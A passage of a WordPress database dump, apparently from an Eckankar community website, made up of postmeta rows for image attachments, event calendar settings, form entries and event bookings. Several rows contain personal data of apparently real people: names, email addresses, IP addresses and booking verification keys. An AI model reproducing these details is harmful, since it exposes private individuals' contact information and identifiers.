0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(166814,266888,'_thumbnail_id','266889'),(167904,267041,'mec_read_more',''),(167903,267041,'mec_organizer_id','1'),(167900,267041,'mec_color',''),(166873,266908,'_wp_attached_file','2022/07/booklets-devices-3.png'),(166874,266908,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:415;s:6:\"height\";i:153;s:4:\"file\";s:30:\"2022/07/booklets-devices-3.png\";s:8:\"filesize\";i:56226;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:30:\"booklets-devices-3-300x111.png\";s:5:\"width\";i:300;s:6:\"height\";i:111;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:28662;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:30:\"booklets-devices-3-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:23678;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:30:\"booklets-devices-3-300x153.png\";s:5:\"width\";i:300;s:6:\"height\";i:153;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:40364;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:30:\"booklets-devices-3-391x153.png\";s:5:\"width\";i:391;s:6:\"height\";i:153;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:48299;}s:8:\"tileview\";a:5:{s:4:\"file\";s:30:\"booklets-devices-3-300x153.png\";s:5:\"width\";i:300;s:6:\"height\";i:153;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:40364;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(166875,266909,'_field_224','Allan'),(166876,266909,'_field_225','Borenstein'),(166877,266909,'_field_226','allanborenstein@yahoo.com'),(166878,266909,'_field_227','CO'),(166879,266909,'_field_228','US'),(166880,266909,'_field_229','a:2:{i:0;s:39:\"Central Colorado/ECK Temple in Colorado\";i:1;s:8:\"Loveland\";}'),(166881,266909,'_form_id','21'),(166882,266909,'_seq_num','153'),(166883,266905,'boldgrid_hide_page_title','0'),(166884,266905,'boldgrid_in_page_containers','1'),(168233,267092,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(168231,267092,'mec_additional_location_ids','a:0:{}'),(168230,267092,'mec_additional_organizer_ids','a:0:{}'),(168215,267087,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:18:\"zgraff@charter.net\";s:4:\"name\";s:13:\"Carolyn Graff\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:11:\"47.12.99.86\";}}'),(168211,267087,'mec_attention_time_end','1662291000'),(168207,267087,'mec_all_dates','a:0:{}'),(168206,267087,'mec_booking_time','2022-08-22 11:24:41'),(168204,267087,'mec_date','1662287400:1662291000'),(168203,267087,'mec_event_id','267041'),(168196,267037,'_oembed_time_17282f16a653c991eb4e3d6f9f01f652','1661101167'),(168187,267076,'_field_450','Lisa'),(168344,267101,'mec_hourly_schedules','a:0:{}'),(168343,267101,'mec_not_in_days',''),(168342,267101,'mec_in_days',''),(168341,267101,'mec_advanced_days','a:0:{}'),(168340,267101,'mec_repeat_end_at_date',''),(168339,267101,'mec_repeat_end_at_occurrences',''),(168324,267101,'mec_public','1'),(168325,267101,'mec_start_date','2022-09-18'),(168326,267101,'mec_start_time_hour','4'),(168327,267101,'mec_start_time_minutes','0'),(168328,267101,'mec_start_time_ampm','PM'),(168329,267101,'mec_start_day_seconds','57600'),(168330,267101,'mec_end_date','2022-09-18'),(168331,267101,'mec_end_time_hour','5'),(168332,267101,'mec_end_time_minutes','30'),(168333,267101,'mec_end_time_ampm','PM'),(168334,267101,'mec_end_day_seconds','63000'),(168335,267101,'mec_repeat_status','0'),(168336,267101,'mec_repeat_type',''),(168337,267101,'mec_repeat_interval','1'),(168338,267101,'mec_repeat_end',''),(168323,267101,'mec_countdown_method','global'),(168322,267101,'mec_timezone','global'),(168321,267101,'mec_comment',''),(168320,267101,'mec_hide_end_time','0'),(168319,267101,'mec_hide_time','0'),(168318,267101,'one_occurrence','0'),(168317,267101,'mec_allday','0'),(168316,267101,'mec_certain_weekdays','a:0:{}'),(168315,267101,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(168310,267101,'mec_cost',''),(168311,267101,'mec_currency','a:0:{}'),(168312,267101,'mec_additional_organizer_ids','a:0:{}'),(168313,267101,'mec_additional_location_ids','a:0:{}'),(168314,267101,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-09-18\";s:4:\"hour\";s:1:\"4\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-09-18\";s:4:\"hour\";s:1:\"5\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(168309,267101,'mec_more_info_target','_self'),(168308,267101,'mec_more_info_title',''),(168307,267101,'mec_more_info',''),(168306,267101,'mec_read_more',''),(168305,267101,'mec_organizer_id','1'),(168304,267101,'mec_dont_show_map','0'),(167054,266951,'_wp_attached_file','2022/07/gratitude-1.jpg'),(167055,266951,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:745;s:6:\"height\";i:418;s:4:\"file\";s:23:\"2022/07/gratitude-1.jpg\";s:8:\"filesize\";i:70409;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"gratitude-1-300x168.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:168;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15479;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"gratitude-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7980;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:23:\"gratitude-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22541;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:23:\"gratitude-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:34762;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:23:\"gratitude-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25675;}s:8:\"tileview\";a:5:{s:4:\"file\";s:23:\"gratitude-1-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26440;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(168303,267101,'mec_location_id','161'),(167057,266951,'smush-info','The file was compressed from 68.76 KB to 68.76 KB saving 0 percent using WP-Optimize'),(167059,266951,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:70409;s:12:\"smushed-size\";i:70409;s:15:\"savings-percent\";d:0;s:10:\"sizes-info\";a:5:{s:6:\"medium\";a:2:{s:8:\"original\";i:15479;s:10:\"compressed\";i:15207;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:7980;s:10:\"compressed\";i:7914;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:22541;s:10:\"compressed\";i:22294;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:34762;s:10:\"compressed\";i:34391;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:25675;s:10:\"compressed\";i:25346;}}}'),(167058,266951,'smush-complete','1'),(168361,267101,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(168301,267101,'protect_children',''),(168302,267101,'mec_color',''),(167063,266604,'_oembed_17282f16a653c991eb4e3d6f9f01f652','<iframe title=\"Eckankar Youth: Just Sing HU! - Ancient Spiritual Exercise\" width=\"420\" height=\"315\" src=\"https://www.youtube.com/embed/wc9N_g2NolA?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),(167064,266604,'_oembed_time_17282f16a653c991eb4e3d6f9f01f652','1658850648'),(167065,7160,'ao_post_optimize','a:6:{s:16:\"ao_post_optimize\";s:2:\"on\";s:19:\"ao_post_js_optimize\";s:2:\"on\";s:20:\"ao_post_css_optimize\";s:2:\"on\";s:12:\"ao_post_ccss\";s:2:\"on\";s:16:\"ao_post_lazyload\";s:2:\"on\";s:15:\"ao_post_preload\";s:0:\"\";}'),(167066,266976,'_wpcode_auto_insert','1'),(167067,266976,'_wpcode_auto_insert_number','1'),(167068,266977,'_wpcode_auto_insert','1'),(167069,266977,'_wpcode_library_id','12'),(167070,266978,'_wpcode_auto_insert','1'),(167071,266978,'_wpcode_auto_insert_number','1'),(167072,266979,'_wpcode_auto_insert','1'),(167073,266979,'_wpcode_library_id','12'),(167074,266980,'_wpcode_auto_insert','1'),(167075,266980,'_wpcode_auto_insert_number','1'),(167076,266981,'_wpcode_auto_insert','1'),(167077,266981,'_wpcode_library_id','12'),(167078,266983,'protect_children',''),(167079,266983,'mec_color',''),(167080,266983,'mec_location_id','131'),(167081,266983,'mec_dont_show_map','0'),(167082,266983,'mec_organizer_id','1'),(167083,266983,'mec_read_more',''),(167084,266983,'mec_more_info',''),(167085,266983,'mec_more_info_title',''),(167086,266983,'mec_more_info_target','_self'),(167087,266983,'mec_cost',''),(167088,266983,'mec_currency','a:0:{}'),(167089,266983,'mec_additional_organizer_ids','a:0:{}'),(167090,266983,'mec_additional_location_ids','a:0:{}'),(167091,266983,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-08-14\";s:4:\"hour\";s:1:\"1\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-08-14\";s:4:\"hour\";s:1:\"3\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(167092,266983,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(167093,266983,'mec_certain_weekdays','a:0:{}'),(167094,266983,'mec_allday','0'),(167095,266983,'one_occurrence','0'),(167096,266983,'mec_hide_time','0'),(167097,266983,'mec_hide_end_time','0'),(167098,266983,'mec_comment',''),(167099,266983,'mec_timezone','global'),(167100,266983,'mec_countdown_method','global'),(167101,266983,'mec_public','1'),(167102,266983,'mec_start_date','2022-08-14'),(167103,266983,'mec_start_time_hour','1'),(167104,266983,'mec_start_time_minutes','0'),(167105,266983,'mec_start_time_ampm','PM'),(167106,266983,'mec_start_day_seconds','46800'),(167107,266983,'mec_end_date','2022-08-14'),(167108,266983,'mec_end_time_hour','3'),(167109,266983,'mec_end_time_minutes','0'),(167110,266983,'mec_end_time_ampm','PM'),(167111,266983,'mec_end_day_seconds','54000'),(167112,266983,'mec_repeat_status','0'),(167113,266983,'mec_repeat_type',''),(167114,266983,'mec_repeat_interval','1'),(167115,266983,'mec_repeat_end',''),(167116,266983,'mec_repeat_end_at_occurrences',''),(167117,266983,'mec_repeat_end_at_date',''),(167118,266983,'mec_advanced_days','a:0:{}'),(167119,266983,'mec_in_days',''),(167120,266983,'mec_not_in_days',''),(167121,266983,'mec_hourly_schedules','a:0:{}'),(167122,266983,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(167123,266983,'mec_tickets','a:0:{}'),(167124,266983,'mec_fees_global_inheritance','1'),(167125,266983,'mec_fees','a:0:{}'),(167126,266983,'mec_ticket_variations_global_inheritance','1'),(167127,266983,'mec_ticket_variations','a:0:{}'),(167128,266983,'mec_reg_fields_global_inheritance','1'),(167129,266983,'mec_reg_fields','a:0:{}'),(167130,266983,'mec_bfixed_fields','a:0:{}'),(167131,266983,'mec_op','a:0:{}'),(167132,266983,'mec_fields','a:0:{}'),(167133,266983,'mec_event_status','EventScheduled'),(167134,266983,'mec_moved_online_link',''),(167135,266983,'mec_cancelled_reason',''),(167136,266983,'mec_display_cancellation_reason_in_single_page',''),(167137,266983,'boldgrid_hide_page_title','0'),(167138,266983,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(167139,266983,'passster_activate_global_protection',NULL),(167140,266983,'passster_activate_protection',NULL),(167141,266983,'passster_protection_type','password'),(167142,266983,'boldgrid_in_page_containers','1'),(167143,266983,'_dp_original','265240'),(167144,266983,'_edit_lock','1658928245:15'),(167145,266983,'_edit_last','15'),(167146,266984,'_wp_attached_file','2022/07/Gateway.webp'),(167147,266984,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:676;s:6:\"height\";i:380;s:4:\"file\";s:20:\"2022/07/Gateway.webp\";s:8:\"filesize\";i:19024;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"Gateway-300x169.webp\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:8992;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"Gateway-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:5202;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:20:\"Gateway-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:12162;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:20:\"Gateway-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:18044;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:20:\"Gateway-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:14162;}s:8:\"tileview\";a:5:{s:4:\"file\";s:20:\"Gateway-300x380.webp\";s:5:\"width\";i:300;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:12012;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(167148,266983,'_thumbnail_id','266984'),(167149,266984,'smush-info','Failed with error code invalid_file_type - /home/eckank5/public_html/wp-content/uploads/2022/07/Gateway.webp - cannot be optimized, it has an invalid file type'),(167150,266984,'smush-complete',''),(167151,266986,'mec_transaction_id','XRD92748'),(167152,266986,'mec_user_id','1000015'),(167153,266986,'mec_verified','1'),(167154,266986,'mec_verification_key','038e2fdd47e9a50071fdbeec18547ae6'),(167155,266986,'mec_cancellation_key','f2985f38814fcfe5b0cb85ee31d248d4'),(167156,266986,'mec_confirmed','1'),(167157,266986,'mec_event_id','266611'),(167158,266986,'mec_date','1660676400:1660680000'),(167159,266986,'mec_ticket_id',',1,'),(167160,266986,'mec_booking_time','2022-07-27 07:54:44'),(167161,266986,'mec_all_dates','a:0:{}'),(167162,266986,'mec_other_dates','a:0:{}'),(167163,266986,'mec_attention_time','1660676400:1660680000'),(167164,266986,'mec_attention_time_start','1660676400'),(167165,266986,'mec_attention_time_end','1660680000'),(167166,266986,'mec_book_date_submit','20220727075444'),(167167,266986,'mec_booking_location','144'),(167168,266986,'mec_ticket_price_1','0'),(167169,266986,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:22:\"lindamaryk@hotmail.com\";s:4:\"name\";s:10:\"Linda Mary\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"47.35.179.159\";}}'),(167170,266986,'mec_price','0'),(167171,266986,'mec_gateway','MEC_gateway_free'),(167172,266986,'mec_gateway_label','Free'),(167173,266987,'mec_transaction_id','NAV22465'),(167174,266987,'mec_user_id','1000015'),(167175,266987,'mec_verified','1'),(167176,266987,'mec_verification_key','49b775f18c957449d0ceeaf93febc34b'),(167177,266987,'mec_cancellation_key','ebb7aff2e4bf4696879209bf844e90aa'),(167178,266987,'mec_confirmed','1'),(167179,266987,'mec_event_id','266604'),(167180,266987,'mec_date','1661082300:1661086800'),(167181,266987,'mec_ticket_id',',1,'),(167182,266987,'mec_booking_time','2022-07-27 08:15:10'),(167183,266987,'mec_all_dates','a:0:{}'),(167184,266987,'mec_other_dates','a:0:{}'),(167185,266987,'mec_attention_time','1661082300:1661086800'),(167186,266987,'mec_attention_time_start','1661082300'),(167187,266987,'mec_attention_time_end','1661086800'),(167188,266987,'mec_book_date_submit','20220727081510'),(167189,266987,'mec_booking_location','118'),(167190,266987,'mec_ticket_price_1','0'),(167191,266987,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:22:\"lindamaryk@hotmail.com\";s:4:\"name\";s:10:\"Linda Mary\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"47.35.179.159\";}}'),(167192,266987,'mec_price','0'),(167193,266987,'mec_gateway','MEC_gateway_free'),(167194,266987,'mec_gateway_label','Free'),(167195,266988,'protect_children',''),(167196,266988,'mec_color',''),(167197,266988,'mec_location_id','122'),(167198,266988,'mec_dont_show_map','0'),(167199,266988,'mec_organizer_id','1'),(167200,266988,'mec_start_date','2022-08-07'),(167201,266988,'mec_start_time_hour','10'),(167202,266988,'mec_start_time_minutes','30'),(167203,266988,'mec_start_time_ampm','AM'),(167204,266988,'mec_start_day_seconds','37800'),(167205,266988,'mec_end_date','2022-08-07'),(167206,266988,'mec_end_time_hour','11'),(167207,266988,'mec_end_time_minutes','30'),(167208,266988,'mec_end_time_ampm','AM'),(167209,266988,'mec_end_day_seconds','41400'),(167210,266988,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-08-07\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-08-07\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(167211,266988,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(167212,266988,'mec_certain_weekdays','a:0:{}'),(167213,266988,'mec_allday','0'),(167214,266988,'mec_hide_time','0'),(167215,266988,'mec_hide_end_time','0'),(167216,266988,'mec_comment',''),(167217,266988,'mec_repeat_status','0'),(167218,266988,'mec_repeat_type',''),(167219,266988,'mec_repeat_interval','1'),(167220,266988,'mec_repeat_end',''),(167221,266988,'mec_repeat_end_at_occurrences',''),(167222,266988,'mec_repeat_end_at_date',''),(167223,266988,'mec_advanced_days','a:0:{}'),(167224,266988,'mec_in_days',''),(167225,266988,'mec_not_in_days',''),(167226,266988,'mec_hourly_schedules','a:0:{}'),(167227,266988,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(167228,266988,'mec_tickets','a:0:{}'),(167229,266988,'mec_fees_global_inheritance','1'),(167230,266988,'mec_fees','a:0:{}'),(167231,266988,'mec_ticket_variations_global_inheritance','1'),(167232,266988,'mec_ticket_variations','a:0:{}'),(167233,266988,'mec_reg_fields_global_inheritance','1'),(167234,266988,'mec_reg_fields','a:0:{}'),(167235,266988,'mec_op','a:0:{}'),(167236,266988,'mec_event_date_submit','20210422105713'),(167237,266988,'mec_read_more',''),(167238,266988,'mec_more_info',''),(167239,266988,'mec_more_info_title',''),(167240,266988,'mec_more_info_target','_self'),(167241,266988,'mec_cost',''),(167242,266988,'mec_currency','a:0:{}'),(167243,266988,'mec_additional_organizer_ids','a:0:{}'),(167244,266988,'mec_additional_location_ids','a:0:{}'),(167245,266988,'one_occurrence','0'),(167246,266988,'mec_timezone','global'),(167247,266988,'mec_countdown_method','global'),(167248,266988,'mec_public','1'),(167249,266988,'mec_bfixed_fields','a:0:{}'),(167250,266988,'mec_fields','a:0:{}'),(167251,266988,'mec_event_status','EventScheduled'),(167252,266988,'mec_moved_online_link',''),(167253,266988,'mec_cancelled_reason',''),(167254,266988,'mec_display_cancellation_reason_in_single_page',''),(167255,266988,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(167256,266988,'passster_activate_global_protection',NULL),(167257,266988,'passster_activate_protection',NULL),(167258,266988,'passster_protection_type','password'),(167259,266988,'_wp_old_date','2022-01-18'),(167260,266988,'boldgrid_in_page_containers','1'),(167263,266988,'_dp_original','266827'),(167262,266988,'_oembed_feb482e9f1973a04e96ed04d346ebf98','{{unknown}}'),(167264,266988,'_edit_lock','1659049813:15'),(167265,266988,'_edit_last','15'),(167266,266988,'_thumbnail_id','266373'),(167267,266990,'protect_children',''),(167268,266990,'mec_color',''),(167269,266990,'mec_location_id','146'),(167270,266990,'mec_dont_show_map','0'),(167271,266990,'mec_organizer_id','1'),(167272,266990,'mec_start_date','2022-08-19'),(167273,266990,'mec_start_time_hour','6'),(167274,266990,'mec_start_time_minutes','30'),(167275,266990,'mec_start_time_ampm','PM'),(167276,266990,'mec_start_day_seconds','66600'),(167277,266990,'mec_end_date','2022-08-19'),(167278,266990,'mec_end_time_hour','7'),(167279,266990,'mec_end_time_minutes','30'),(167280,266990,'mec_end_time_ampm','PM'),(167281,266990,'mec_end_day_seconds','70200'),(167282,266990,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-08-19\";s:4:\"hour\";s:1:\"6\";s:7:\"minutes\